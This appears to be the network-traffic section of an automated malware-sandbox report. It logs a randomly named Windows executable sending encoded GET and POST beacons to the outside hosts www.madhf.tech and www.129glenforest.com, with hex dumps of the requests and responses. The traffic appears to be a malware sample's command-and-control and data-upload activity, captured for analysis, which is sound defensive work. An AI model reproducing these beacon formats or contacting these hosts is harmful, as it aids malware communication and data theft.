                                                                                  Data Raw: 32 38 65 0d 0a 1f 8b 08 00 00 00 00 00 00 00 85 54 4d 73 d3 30 10 bd f3 2b 84 4f 30 44 96 f3 4d d3 38 3d 50 86 0b 43 f9 e8 0c c3 89 91 ed b5 ad 44 96 54 69 9d 34 fc 7a d6 4e 42 4b 09 d3 83 b3 f6 ae de d3 db d5 53 96 2f af 6f de dd fe f8 fc 9e d5 d8 e8 d5 8b 65 17 98 96 a6 4a 23 30 51 97 00 59 50 68 00 25 cb 6b e9 03 60 1a b5 58 f2 b7 5d 15 15 6a 58 0d 47 17 ec 83 06 53 5a 0f 01 d9 d7 22 5e 8a 43 e5 08 34 b2 81 34 da 2a d8 39 eb 31 62 b9 35 08 86 88 76 aa c0 3a 2d 60 ab 72 e0 fd
                                                                                  Data Ascii: 28eTMs0+O0DM8=PCDTi4zNBKS/oeJ#0QYPh%k`X]jXGSZ"^C44*91b5v:-`r
                                                                                  Nov 13, 2024 15:36:23.779068947 CET505INData Raw: c7 80 29 a3 50 49 cd 43 2e 35 a4 c3 38 e9 36 d2 ca 6c 98 07 9d 46 01 f7 1a 42 0d 40 3c b5 87 32 8d 6a 44 17 16 42 94 c4 1a e2 ca da 4a 83 74 2a c4 b9 6d 44 1e c2 55 29 1b a5 f7 e9 8d 03 f3 e6 9b 34 61 31 4e 92 c1 84 9e 19 3d f3 e4 d9 0d 84 d3 6d
                                                                                  Data Ascii: )PIC.586lFB@<2jDBJt*mDU)4a1N=mLK',uQ&#k; ~uqIn!]0GQIdFun],24:mdmMh~u6c(aNv+"*+<wEK^h:%


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.55001850.18.131.220803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:25.628222942 CET446OUTGET /jj95/?2J=Pexrq8dBT+pohtdREgLaj2qM8aDHNwg4eoWqtxa3tUqS44OvUmk7LsvxHK5YH7fdz4458FvKpzVKrVQ2/F68/gTe2ya6Lr7IE54iaP1hci4bc8/+8Y3du4MuylwBJQVzoQ==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.129glenforest.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:36:26.699529886 CET1236INHTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:26 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Content-Length: 1192
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=p87W7LoORFfB/qAnNu20FcPv7MZFjPEe1WgFyZsxAZjXcCrd9EswJAd3MHAFploXRA4UT+nS8LVBaMklu0hHDiLyVKdgbtaef2tYk/ZbCRiqV7cZHAaq3w1cY6Ej; Expires=Wed, 20 Nov 2024 14:36:26 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=p87W7LoORFfB/qAnNu20FcPv7MZFjPEe1WgFyZsxAZjXcCrd9EswJAd3MHAFploXRA4UT+nS8LVBaMklu0hHDiLyVKdgbtaef2tYk/ZbCRiqV7cZHAaq3w1cY6Ej; Expires=Wed, 20 Nov 2024 14:36:26 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=e16447c0-4acc-4667-bfa9-7d2affaace7c;Path=/;Expires=Thu, 12-Nov-2054 22:27:56 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:56 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508586200;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508586200;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 31 32 39 20 47 6c 65 6e 66 6f 72 65 73 74 20 52 64 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>129 Glenforest Rd.</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="stylesheet"
                                                                                  Nov 13, 2024 15:36:26.699551105 CET1001INData Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65
                                                                                  Data Ascii: href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700"><link rel="stylesheet" href="/plugins/bootstrap-4.6.2/css/bootstrap.min.css"><link href="/views/themes/_common/css/property-lead.css?v=1.0.1" rel="stylesheet"></head>
                                                                                  Nov 13, 2024 15:36:26.699562073 CET1001INData Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65
                                                                                  Data Ascii: href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700"><link rel="stylesheet" href="/plugins/bootstrap-4.6.2/css/bootstrap.min.css"><link href="/views/themes/_common/css/property-lead.css?v=1.0.1" rel="stylesheet"></head>
                                                                                  Nov 13, 2024 15:36:26.700324059 CET1236INHTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:26 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Content-Length: 1192
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=p87W7LoORFfB/qAnNu20FcPv7MZFjPEe1WgFyZsxAZjXcCrd9EswJAd3MHAFploXRA4UT+nS8LVBaMklu0hHDiLyVKdgbtaef2tYk/ZbCRiqV7cZHAaq3w1cY6Ej; Expires=Wed, 20 Nov 2024 14:36:26 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=p87W7LoORFfB/qAnNu20FcPv7MZFjPEe1WgFyZsxAZjXcCrd9EswJAd3MHAFploXRA4UT+nS8LVBaMklu0hHDiLyVKdgbtaef2tYk/ZbCRiqV7cZHAaq3w1cY6Ej; Expires=Wed, 20 Nov 2024 14:36:26 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=e16447c0-4acc-4667-bfa9-7d2affaace7c;Path=/;Expires=Thu, 12-Nov-2054 22:27:56 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:56 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508586200;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508586200;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:26 UTC;HttpOnly
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 31 32 39 20 47 6c 65 6e 66 6f 72 65 73 74 20 52 64 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>129 Glenforest Rd.</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="stylesheet"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.550019103.224.182.242803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:40.162446022 CET694OUTPOST /p31e/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.madhf.tech
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/p31e/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 47 38 64 36 38 30 35 54 66 2b 61 63 4c 6d 45 72 55 73 57 63 34 71 6c 62 4b 76 49 39 6c 62 4a 76 78 61 49 54 49 7a 74 45 42 4d 59 79 34 6b 33 61 62 6b 49 31 7a 46 41 78 36 78 4e 66 2b 69 62 68 6c 4f 66 68 6c 36 35 36 58 35 4f 5a 46 2f 6a 2f 2b 41 6f 6b 64 66 68 4d 36 77 78 58 52 6d 78 35 4d 4e 59 74 49 73 4d 33 4d 31 65 32 30 5a 59 4b 6d 4c 6d 46 51 46 64 30 43 54 51 70 34 31 70 43 32 43 66 55 6e 5a 56 46 55 36 59 67 66 30 4a 6d 46 66 58 6c 61 46 4e 38 68 59 37 53 39 73 66 67 70 42 38 71 38 35 75 2f 55 37 41 6f 64 74 58 52 33 53 74 56 4c 6e 72 4c 78 78 56 6b 50 45 37 38 2f 37 4d 37 7a 79 34 3d
                                                                                  Data Ascii: 2J=G8d6805Tf+acLmErUsWc4qlbKvI9lbJvxaITIztEBMYy4k3abkI1zFAx6xNf+ibhlOfhl656X5OZF/j/+AokdfhM6wxXRmx5MNYtIsM3M1e20ZYKmLmFQFd0CTQp41pC2CfUnZVFU6Ygf0JmFfXlaFN8hY7S9sfgpB8q85u/U7AodtXR3StVLnrLxxVkPE78/7M7zy4=
                                                                                  Nov 13, 2024 15:36:40.879652023 CET871INHTTP/1.1 200 OK
                                                                                  date: Wed, 13 Nov 2024 14:36:40 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1731508600.3861162; expires=Sat, 11-Nov-2034 14:36:40 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 57 15 20 b5 71 38 20 21 81 38 a0 5d 38 23 af 33 69 bc 9b d8 c1 9e b6 54 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 3f 49 dc aa 9d 3a 45 53 08 5e cb 54 dc 06 d1 18 bb 41 3f 78 63 49 18 d3 60 d1 1b 5b dc 86 b4 2a c5 09 fb 52 aa 2a d9 29 0f 1e 6b e3 51 d3 f7 ce d8 3b 90 90 b5 44 c3 4a 88 fd 7e 5f 3c a9 13 c3 f2 12 c5 bb 6c 9d 24 42 c0 35 12 28 20 d3 a3 db 12 b8 06 96 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 f8 13 f5 96 90 81 0f 25 c0 34 40 2d c2 33 e5 30 78 d7 9b c0 31 65 ba 00 8d f3 10 5c 8f 4c 51 c1 d9 a4 d9 5a 4d c6 59 3e ee ba 1b a5 ef ae a6 54 f9 1c ee 93 d9 de d8 da ed 8b ce 69 15 51 85 c7 a1 53 1a f3 df 3c 9d 67 cd 20 2f de 66 f3 75 72 4c 12 f2 87 c8 64 95 81 c0 d7 fe eb 64 42 42 40 9a 36 f9 9f d5 5e 45 83 cc 9f c5 86 35 c3 97 49 b3 84 0f 4f 4e 3e 5d b3 0e 55 e7 f7 bd b3 86 1c 87 36 ab 28 3b e0 31 32 1f 59 c9 [TRUNCATED]
                                                                                  Data Ascii: TM0=7b=$qW q8 !8]8#3iTwiX|I<~o8eK}W%eU6nKq$etP?I:ES^TA?xcI`[*R*)kQ;DJ~_<l$B5( F{P;[ %4@-30x1e\LQZMY>TiQS<g /furLddBB@6^E5ION>]U6(;12YlVpl +Vl2{:(v&bKm;]}>rt)Ws!b7mm:\\8G0o6uWqbykY\&RA8z}-zR(8X7){$N/dm<@D.|x/hy@+&


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.550020103.224.182.242803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:42.715481043 CET714OUTPOST /p31e/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.madhf.tech
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/p31e/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 47 38 64 36 38 30 35 54 66 2b 61 63 4a 47 55 72 58 4e 57 63 2b 4b 6c 59 50 76 49 39 77 4c 4a 30 78 61 4d 54 49 78 41 42 42 35 6f 79 34 46 48 61 4a 31 49 31 77 46 41 78 31 52 4e 61 39 53 61 74 6c 4f 69 4c 6c 37 46 36 58 35 61 5a 46 36 48 2f 2f 7a 41 6a 64 50 68 4f 31 51 78 56 4f 32 78 35 4d 4e 59 74 49 73 59 52 4d 31 57 32 30 70 6f 4b 67 61 6d 43 59 6c 64 31 44 54 51 70 76 6c 70 34 32 43 66 36 6e 62 67 51 55 2f 63 67 66 31 35 6d 46 4f 58 6d 56 46 4e 2b 6c 59 37 48 7a 4a 2b 54 75 79 52 6a 2b 71 75 2b 4b 49 59 4f 56 37 6d 37 74 77 6c 39 59 48 48 7a 68 69 64 54 65 30 61 56 6c 59 63 4c 74 6c 75 66 6a 58 54 65 37 4f 63 6f 52 62 66 45 68 55 77 52 6c 79 56 44
                                                                                  Data Ascii: 2J=G8d6805Tf+acJGUrXNWc+KlYPvI9wLJ0xaMTIxABB5oy4FHaJ1I1wFAx1RNa9SatlOiLl7F6X5aZF6H//zAjdPhO1QxVO2x5MNYtIsYRM1W20poKgamCYld1DTQpvlp42Cf6nbgQU/cgf15mFOXmVFN+lY7HzJ+TuyRj+qu+KIYOV7m7twl9YHHzhidTe0aVlYcLtlufjXTe7OcoRbfEhUwRlyVD
                                                                                  Nov 13, 2024 15:36:43.384516954 CET871INHTTP/1.1 200 OK
                                                                                  date: Wed, 13 Nov 2024 14:36:43 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1731508603.5858274; expires=Sat, 11-Nov-2034 14:36:43 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 57 15 20 b5 71 38 20 21 81 38 a0 5d 38 23 af 33 69 bc 9b d8 c1 9e b6 54 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 3f 49 dc aa 9d 3a 45 53 08 5e cb 54 dc 06 d1 18 bb 41 3f 78 63 49 18 d3 60 d1 1b 5b dc 86 b4 2a c5 09 fb 52 aa 2a d9 29 0f 1e 6b e3 51 d3 f7 ce d8 3b 90 90 b5 44 c3 4a 88 fd 7e 5f 3c a9 13 c3 f2 12 c5 bb 6c 9d 24 42 c0 35 12 28 20 d3 a3 db 12 b8 06 96 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 f8 13 f5 96 90 81 0f 25 c0 34 40 2d c2 33 e5 30 78 d7 9b c0 31 65 ba 00 8d f3 10 5c 8f 4c 51 c1 d9 a4 d9 5a 4d c6 59 3e ee ba 1b a5 ef ae a6 54 f9 1c ee 93 d9 de d8 da ed 8b ce 69 15 51 85 c7 a1 53 1a f3 df 3c 9d 67 cd 20 2f de 66 f3 75 72 4c 12 f2 87 c8 64 95 81 c0 d7 fe eb 64 42 42 40 9a 36 f9 9f d5 5e 45 83 cc 9f c5 86 35 c3 97 49 b3 84 0f 4f 4e 3e 5d b3 0e 55 e7 f7 bd b3 86 1c 87 36 ab 28 3b e0 31 32 1f 59 c9 [TRUNCATED]
                                                                                  Data Ascii: TM0=7b=$qW q8 !8]8#3iTwiX|I<~o8eK}W%eU6nKq$etP?I:ES^TA?xcI`[*R*)kQ;DJ~_<l$B5( F{P;[ %4@-30x1e\LQZMY>TiQS<g /furLddBB@6^E5ION>]U6(;12YlVpl +Vl2{:(v&bKm;]}>rt)Ws!b7mm:\\8G0o6uWqbykY\&RA8z}-zR(8X7){$N/dm<@D.|x/hy@+&


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.550021103.224.182.242803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:46.119581938 CET1731OUTPOST /p31e/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.madhf.tech
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/p31e/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 47 38 64 36 38 30 35 54 66 2b 61 63 4a 47 55 72 58 4e 57 63 2b 4b 6c 59 50 76 49 39 77 4c 4a 30 78 61 4d 54 49 78 41 42 42 35 67 79 2f 7a 62 61 62 48 67 31 78 46 41 78 34 78 4e 62 39 53 61 67 6c 4f 36 51 6c 37 4a 4d 58 37 69 5a 45 63 62 2f 72 53 41 6a 4f 76 68 4f 2b 77 78 51 52 6d 78 6f 4d 4d 6f 78 49 73 49 52 4d 31 57 32 30 72 77 4b 32 37 6d 43 56 46 64 30 43 54 52 6f 34 31 6f 32 32 43 58 4d 6e 62 30 41 56 4d 6b 67 65 56 70 6d 48 38 76 6d 59 46 4e 34 70 34 36 43 7a 4a 36 4d 75 79 4d 59 2b 70 7a 5a 4b 49 67 4f 57 50 7a 33 2b 30 35 55 50 42 66 56 73 42 6c 44 41 54 57 46 6d 72 68 35 6d 58 57 52 35 6e 2f 44 77 35 4d 6b 55 59 79 58 2b 77 31 47 6c 33 77 6c 6d 66 67 67 49 71 45 6a 51 6e 65 44 56 56 48 5a 75 78 44 6a 4d 5a 41 43 61 70 63 2f 58 4e 44 71 36 51 55 5a 4c 71 43 35 70 75 6a 39 39 2f 75 7a 2f 71 65 48 33 6c 42 49 32 4d 37 46 4a 54 75 71 69 6c 4f 49 37 36 52 64 35 6f 59 6e 56 72 30 4b 66 78 4e 4d 46 47 77 32 53 52 55 33 36 77 48 66 39 57 55 37 32 35 73 53 47 7a 4e 38 67 69 4d 50 52 62 58 [TRUNCATED]
                                                                                  Data Ascii: 2J=G8d6805Tf+acJGUrXNWc+KlYPvI9wLJ0xaMTIxABB5gy/zbabHg1xFAx4xNb9SaglO6Ql7JMX7iZEcb/rSAjOvhO+wxQRmxoMMoxIsIRM1W20rwK27mCVFd0CTRo41o22CXMnb0AVMkgeVpmH8vmYFN4p46CzJ6MuyMY+pzZKIgOWPz3+05UPBfVsBlDATWFmrh5mXWR5n/Dw5MkUYyX+w1Gl3wlmfggIqEjQneDVVHZuxDjMZACapc/XNDq6QUZLqC5puj99/uz/qeH3lBI2M7FJTuqilOI76Rd5oYnVr0KfxNMFGw2SRU36wHf9WU725sSGzN8giMPRbXCwrQihTbYUVLoLGRmJJ5rL97P26IDFE5jP9DT9dmuC/sIl7wQBl9oePQUsByGkMcaW8mqVsfRoRmff8IuYdklYmxOmaX5zpXkiJFnORk2BE36L/t5WCeWBOOvfIQLJhZfLxcPFnZLwuryNZ5gLH7v+w9Sifr0kkZDw+2+G9TVaXulS6kl0wAjrD89X3XMpuoe7SmhFDRA5txvvRlN9MzORbzmsXs5VaO+QXCSfOSDZj6IJEpEzFEiccoSSbpBRoQxrMYgVuHwvTSE0D/zOwza92vBTwy1JPJB60e5zS8CFyOqgkKwrz/AKGD6HHrgikvGt0kWr5eASUkqH2sROy2FzCuKFNJxgT/XlKhdqCYBnKZgwQ8W589KQBdc0bHvVL27sdPSTcf036PVOtyethdQN1ZxSS8Q612yVdZHIbeGbEd4EiHuOIycAZ6t/QNt8eaVP6oZjEzzAN4e3134nfH38DgtehFN5PKIpa+gp8rLczfN6lMQHezbzQM5jUaaQEV+pInzdEnzWBT0RWMOtfVIxhG3kSK2vm11jcifONBd/Z4y80g6HFtvtmpOdEaSgp+EHhnUjF9/W75EKsgqWc7QJqX0bpVzhpGZuRdIp5BhD7ImUkmSiwLDl/oXjXABhuUTBFufTS+vw/C9pAgbNnPSqZ611tGuDfkjI [TRUNCATED]
                                                                                  Nov 13, 2024 15:36:46.796236038 CET871INHTTP/1.1 200 OK
                                                                                  date: Wed, 13 Nov 2024 14:36:46 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1731508606.5697575; expires=Sat, 11-Nov-2034 14:36:46 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 57 15 20 b5 71 38 20 21 81 38 a0 5d 38 23 af 33 69 bc 9b d8 c1 9e b6 54 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 3f 49 dc aa 9d 3a 45 53 08 5e cb 54 dc 06 d1 18 bb 41 3f 78 63 49 18 d3 60 d1 1b 5b dc 86 b4 2a c5 09 fb 52 aa 2a d9 29 0f 1e 6b e3 51 d3 f7 ce d8 3b 90 90 b5 44 c3 4a 88 fd 7e 5f 3c a9 13 c3 f2 12 c5 bb 6c 9d 24 42 c0 35 12 28 20 d3 a3 db 12 b8 06 96 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 f8 13 f5 96 90 81 0f 25 c0 34 40 2d c2 33 e5 30 78 d7 9b c0 31 65 ba 00 8d f3 10 5c 8f 4c 51 c1 d9 a4 d9 5a 4d c6 59 3e ee ba 1b a5 ef ae a6 54 f9 1c ee 93 d9 de d8 da ed 8b ce 69 15 51 85 c7 a1 53 1a f3 df 3c 9d 67 cd 20 2f de 66 f3 75 72 4c 12 f2 87 c8 64 95 81 c0 d7 fe eb 64 42 42 40 9a 36 f9 9f d5 5e 45 83 cc 9f c5 86 35 c3 97 49 b3 84 0f 4f 4e 3e 5d b3 0e 55 e7 f7 bd b3 86 1c 87 36 ab 28 3b e0 31 32 1f 59 c9 [TRUNCATED]
                                                                                  Data Ascii: TM0=7b=$qW q8 !8]8#3iTwiX|I<~o8eK}W%eU6nKq$etP?I:ES^TA?xcI`[*R*)kQ;DJ~_<l$B5( F{P;[ %4@-30x1e\LQZMY>TiQS<g /furLddBB@6^E5ION>]U6(;12YlVpl +Vl2{:(v&bKm;]}>rt)Ws!b7mm:\\8G0o6uWqbykY\&RA8z}-zR(8X7){$N/dm<@D.|x/hy@+&


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.550022103.224.182.242803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:48.659477949 CET439OUTGET /p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.madhf.tech
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:36:49.327467918 CET1236INHTTP/1.1 200 OK
                                                                                  date: Wed, 13 Nov 2024 14:36:49 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1731508609.6537356; expires=Sat, 11-Nov-2034 14:36:49 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 1502
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 70 33 31 65 2f 3f 32 4a 3d 4c 2b 31 61 2f 42 64 47 59 73 7a 65 41 47 63 56 53 38 4b 38 2b 38 70 4c 4c 75 73 4b 39 37 45 52 39 61 42 68 50 69 4d 72 47 34 6b 6e 36 47 44 35 50 6a 42 62 39 44 6f 4c 30 43 46 49 33 31 75 44 76 4d 54 4d 34 4e 5a 51 42 72 65 4a 63 64 71 61 31 78 49 69 49 73 70 78 35 41 70 6a 48 6c 64 44 4b 76 42 78 41 50 30 44 4d 6c 71 43 6e 5a 56 38 38 72 6d 55 63 48 49 